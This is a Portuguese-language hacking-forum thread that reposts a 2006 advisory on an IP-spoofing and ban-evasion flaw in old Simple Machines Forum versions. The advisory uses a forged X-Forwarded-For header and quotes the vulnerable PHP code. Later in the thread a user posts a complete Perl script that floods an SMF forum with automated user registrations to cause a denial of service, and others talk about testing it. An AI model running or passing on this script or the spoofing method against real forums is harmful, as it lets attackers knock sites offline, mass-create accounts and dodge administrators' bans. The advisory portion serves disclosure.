FORUM DARKERS

Exploit para SMF versão 1.1 RC2 ou abaixo, usa a técnica IP Spoofing. Normalmente usado para uma evasão.


==================================================

Advisory : SMF 1.0.7 and lower plus 1.1rc2 and lower - IP spoofing
vulnerability/IP ban evasion vulnerability
Release Date : June 02, 2006
Application : SMF
Version : SMF 1.0.7 and previous versions, SMF1.1rc2 and lower
Platform : PHP
Vendor URL : http://www.simplemachines.org/
Author : Jessica Hope (jessicasaulhope (at) googlemail (dot) com [email concealed])

==================================================

Overview

The IP detection section of SMF's code allows for someone to spoof the
X-Forwarded-For header.
SMF trusts this value over the IP address reported in general.

This allows an attacker to login and post using IP's that are not theirs,
making it impossible for the Administrator of the SMF forum to ban the user.

==================================================

Discussion

There's code in QueryString.php that starts:

elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
// If there are commas, get the last one.. probably.
if (strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',') !== false)
{
$ips = array_reverse(explode(', ', $_SERVER['HTTP_X_FORWARDED_FOR']));

// Go through each IP...
foreach ($ips as $i => $ip)
{
// Make sure it's in a valid range...
if (preg_match('~^((0|10|172\.16|192\.168|255|127\.0)\.|unknown)~',
$ip) != 0)
continue;

// Otherwise, we've got an IP!
$_SERVER['REMOTE_ADDR'] = trim($ip);
break;
}
}
// Otherwise just use the only one.
elseif (preg_match('~^((0|10|172\.16|192\.168|255|127\.0)\.|unknown)~',
$_SERVER['HTTP_X_FORWARDED_FOR']) == 0)
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

This code is used to obtain the users IP address. However, if
X-Forwarded-For HTTP header has been provided,
it will take the last IP address from the X-Forwared-For header and
blindly trust it to be the real IP address.
The problem is that the X-Forwarded-For HTTP header is easily forgable
via a number of methods.

For example, if the X-Forwarded-For header was set:

X-Forwarded-For: 1.2.3.4

the SMF application trusts 1.2.3.4 to be their IP address, and will
reflect this fact when the user does anything that SMF logs,
such as posting to the forum.This makes it possible for a user to set
the X-Forwareded-For IP to that of another user in
an attempt to masquerade as them. It also would require the SMF
administrator to track down the users real IP via httpd server logs,
assuming this is possible, which in some cases it is not.
This would also assume the SMF administrator knows the IP presented to
them isn't real.

On top of this, there's code in Security.php that starts:

// Check if we have a valid IP address.
if (preg_match('/^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/',
$user_info['ip'], $ip_parts) == 1)
{
$ban_query[] = "(ban_type = 'ip_ban'
AND ($ip_parts[1] BETWEEN ip_low1 AND ip_high1)
AND ($ip_parts[2] BETWEEN ip_low2 AND ip_high2)
AND ($ip_parts[3] BETWEEN ip_low3 AND ip_high3)
AND ($ip_parts[4] BETWEEN ip_low4 AND ip_high4))";

// IP was valid, maybe there's also a hostname...
if (empty($modSettings['disableHostnameLookup']))
{
$hostname = @gethostbyaddr($user_info['ip']);
if (strlen($hostname) > 0)
$ban_query[] = "(ban_type = 'hostname_ban' AND ('$hostname' LIKE
hostname))";
}
}
This code indicates that a user could bypass bans on their IP by
setting the X-Forwarded-For header,
seeing as SMF blindly trusts the X-Forwarded-For IP to be real.

==================================================

Creio que o Darkers já esteja sem ussa "vulnerabilidade", já que o administrador DarkGênesis foi avisado por mim a um tempo já.

HadeS

Sim, já foi corrigida essa falha do Simple Machine.

Alguem pode explicar como funca isso???

Pesquise sobre HTTP Headers. A falha permite que voce falsifique seu endereco IP em foruns usando o sistema Simple Machines Forums (//http://www.simplemachines.org/) (o mesmo do Darkers), evitando ser rastreado e passando por bans de IP.

Heys! Veja este xpl que encontrei:

 
#SMF DOS By Viran
#Attempts to Register Multiple Users on Desired SMF forum
#Works on Most Versions, cant tell you exact, did not experiment enough #to give affected versions.

use IO::Socket;

print "SMF Multiple User Registration DoS by viran\n\n";

print q(Enter a Host Name, ex www.host.com:
);
$host = <STDIN>;
chop ($host);

print q(Enter The Forum Directory ex /smf:
);
$dir = <STDIN>;
chop ($dir);

print q(Enter a Botname:
);
$bot = <STDIN>;
chop ($bot);


while($x != 999999999999999999999999999999999999)
{
$login ="$bot$x";

$email ="blank$x";

$sticky="user=$login&email=$email%40gg.com&passwrd1=password&passwrd2=password®agree=on®Submit=Register";
$lgth = length($sticky);


my $sock = new IO::Socket::INET (
                                 PeerAddr => "$host",
                                 PeerPort => "80",
                                 Proto => "tcp",
                                ) or die "Could Not Open a Socket \n Check the Desired Host You Entered, it may be dosed";

print $sock "POST $dir/index.php?action=register2 HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Accept-Language: en-us,en;q=0.5\n";
print $sock "Accept-Encoding: gzip,deflate\n";
print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n";
print $sock "Keep-Alive: 300\n";
print $sock "Connection: keep-alive\n";
print $sock "Referer: http://www.$host/smf/index.php?PHPSESSID=95e0352c6697ffe00a2e829231320f3e&action=register\n";
print $sock "Cookie: PHPSESSID=95e0352c6697ffe00a2e829231320f3e\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-Length: $lgth\n";
print $sock "$sticky\n";
close($sock);
print".";
$x++
}
Este xpl provoca um D.o.S. e segundo o autor, a maior parte das versao estao vulneraveis!! Portanto acho melhor ao admins do forum caso ainda nao tenham testado este xpl que testem! hehehe
Para provocar o D.o.S. este xpl explora uma falha ao nivel do registo de utilizadores, fazendo este script multiplos registos de utilizadores...

Abraços,

Obrigado cypthief, vou testar.

Quote from: "Shady"Obrigado cypthief, vou testar.

Não te preocupa não funcionou não


abraço shady

Ok slul, obrigado por testar

Heys! Eu ia esta manha testar! Como sou de Portugal, postei ontem a noite e ja era tarde e meus pais me estavam chamando para me ir deitar porque tenho aulas de manha cedo! Ah, e obrigado Slul por testar!!! Afinal, esse xpl nao deve afectar todas as versoes como diz o autor... mas ainda bem que nao funciona contra o darkers!

Abraços,